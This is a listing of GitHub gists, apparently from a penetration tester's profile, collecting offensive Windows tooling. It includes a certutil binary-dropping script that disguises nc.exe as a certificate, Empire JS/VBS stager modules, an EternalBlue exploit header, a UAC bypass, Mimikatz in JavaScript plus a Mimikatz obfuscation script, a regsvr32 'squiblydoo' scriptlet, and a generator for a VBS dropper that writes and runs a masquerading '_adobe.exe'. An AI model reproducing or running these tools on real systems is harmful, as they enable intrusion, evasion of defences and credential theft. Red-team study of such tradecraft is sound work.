Rahmat Nurfauzi infosecn1nja
@infosecn1nja
infosecn1nja / drop_binary.sh
Created July 16, 2017 00:11
Drop binary executable using certutil on Windows
#!/bin/bash
# drop_binary.sh
# ./drop_binary.sh /usr/share/windows-binaries/nc.exe nc.txt
# certutil -decode encoded.txt decoded.bin
echo "-----BEGIN CERTIFICATE-----" > $2
cat $1 | base64 >> $2
echo "-----END CERTIFICATE-----" >> $2
sed -i 's/^/echo /g' $2 && sed -i 's/$/ >> encoded.txt/g' $2
@infosecn1nja
infosecn1nja / starfighter_js.py
Created July 21, 2017 23:45
Empire stager module to generate a .js launcher.
from lib.common import helpers
class Stager:
    def __init__(self, mainMenu, params=[]):
        self.info = {
            'Name': 'JS Launcher StarFighter',
            'Author': ['Cn33liz'],
@infosecn1nja
infosecn1nja / eternalblue7_exploit.py
Created July 22, 2017 01:04 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@infosecn1nja
infosecn1nja / EventVwrBypass.cs
Created July 22, 2017 01:04 — forked from leoloobeek/EventVwrBypass.cs
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
@infosecn1nja
infosecn1nja / katz.js
Created July 22, 2017 01:05
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
@infosecn1nja
infosecn1nja / Agentless-Post-Exploitation.md
Created July 22, 2017 01:07
Agentless Post-Exploitation

Agentless Post-Exploitation

Reconnaissance

echo %LOGONSERVER%
net view /DOMAIN:domain

Check Administrators Rights

@infosecn1nja
infosecn1nja / starfighter_vbs.py
Created July 24, 2017 09:01
Empire stager module to generate a .vbs launcher.
from lib.common import helpers
class Stager:
    def __init__(self, mainMenu, params=[]):
        self.info = {
            'Name': 'VBS Launcher StarFighter',
            'Author': ['Cn33liz'],
@infosecn1nja
infosecn1nja / Backdoor-Minimalist.sct
Created August 17, 2017 01:11
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
#!/bin/bash
if [[ $# -le 1 ]] ; then
echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
exit 1
fi
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
cp $1 $2
#!/bin/bash
convert2hex=$(xxd -p $1)
result=$(echo $convert2hex | sed s'/ //g')
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)'